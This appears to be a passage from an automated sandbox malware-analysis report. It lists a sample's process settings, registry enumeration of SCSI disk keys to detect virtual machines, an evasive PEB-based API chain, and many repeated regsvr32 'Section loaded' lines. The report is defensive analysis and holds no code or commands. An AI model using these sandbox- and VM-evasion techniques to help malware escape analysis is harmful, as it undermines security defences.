Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1DCB.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjhisi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjhisi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjhisi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjhisi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjhisi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjhisi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_16-11623

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
